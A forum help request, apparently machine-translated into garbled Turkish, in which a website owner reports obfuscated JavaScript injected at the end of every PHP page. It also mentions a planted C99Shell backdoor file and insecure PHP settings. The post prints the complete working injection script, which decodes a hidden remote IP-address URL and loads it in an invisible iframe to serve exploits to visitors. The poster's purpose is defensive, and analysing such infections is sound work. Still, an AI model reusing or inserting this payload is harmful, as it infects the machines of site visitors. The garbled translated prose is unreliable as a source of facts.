PHP komut: sonunda zararlı JavaScript kodu

0 Cevap php

The problem:

Benim site alanı tüm bu sona PHP dosyaları vardır:

<?php include 'footer.php'; ?>

Bu hat önce, dosyalarda HTML kodu da bulunmaktadır.

Tarayıcıda çıktısı elbette, bu ile biter:

</body>
</html>

Ama dün, bazı kötü niyetli kod aniden, sonunda oldu. Benim index.php çıkışı oldu:

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

Ben (FTP üzerinden yüklenebilir) Fotoğraf: www.alanadiniz.com/ dosyayı açtı ve ben Birisi sağ dosyasına bu kodu koymak olduğunu gördüm!

How could this happen?

Ben hayal edebiliyorum tek yolu:

  • Birisi FTP şifre var. Ama o sadece bir dosya içine koymak olurdu. O çok daha fazla zarar yapmış olabilir. Yani bu durumda hayal edemiyorum.
  • Benim PC'de kendimi bir virüs var. Ben yüklemek için düzenleme ve FileZilla için Notepad + + kullanın. Belki bu programlar yanı kirlenmiş ve kötü niyetli kod yüklendi - bilmeden.
  • Birisi sayfasına bu kodu koymak için bir güvenlik delik (XSS) kullanılır. Ama o, sağ dosyasına olabilir koymak olamazdı?

Symptoms:

Kullanıcılar Firefox haşhaş mavi paneli bildirdi. Bu bir eklenti yüklemek istedi. Şimdi bazıları kendi PC Exploit.Java.CVE-2010-0886.a var.

Bu kötü niyetli kod nedeniyle mi? Kodu tam olarak ne yaptın?

Can you help me?

Lütfen bana yardım edin, ben gerçekten çok çaresizim.

Belki bir ek soru, sen ben var nasıl biliyorsanız: nasıl Gelecekte böyle bir şey engel olabilir?

Edit #1:

Benim site alanı kök dizininde "x76x09.php" adında bir dosya buldum. Bu 44,281 bayt bir dosya boyutu vardır. Ben indirilen ve açmaya çalıştım. Ama benim antivirüs yazılımı bir trojan (Trojan.Script.224490) dedi. Ben bu dosya yürütülür ve her dizinde "index.php" için zararlı kod eklendi düşünüyorum. Bu yardımcı olur mu? Nasıl trojan benim site alanı gelebilir? Bu bilinen bir virüs mü?

Edit #2:

Benim hoster o anda dosya FTP üzerinden karşıya değildi emin olabilirsiniz diyor. Yani enfeksiyon FTP üzerinden olmadı. Benim sahibesi göre, güvensiz komut olmalıdır.

Edit #3:

PHPSecInfo göre güvenlik açıkları:

  • allow_url_fopen = 1
  • allow_url_include = 1
  • expose_php = 1
  • file_uploads = 1 (kötü niyetli "x76x09.php" dosyası için sorumlu bu nedir?)
  • group_id = 99
  • User_id = 99

Edit #4:

Ben benim webserver idam edilmişti dosyayı analiz ettik. Here's the results.

Yani bu virüs olarak bilinen görünüyor:

  • PHP/C99Shell.BF
  • Backdoor/PHP.C99Shell
  • BackDoor.Generic_c.CQA
  • Trojan.Script.224490
  • Exploit.PHP.635
  • Backdoor.PHP.C99Shell.bf
  • Trojan.Script.224490

Bazıları kötü niyetli kod eklendi benim site alanı üzerinde zararlı dosya neden olabilir?

0 Cevap

etiketler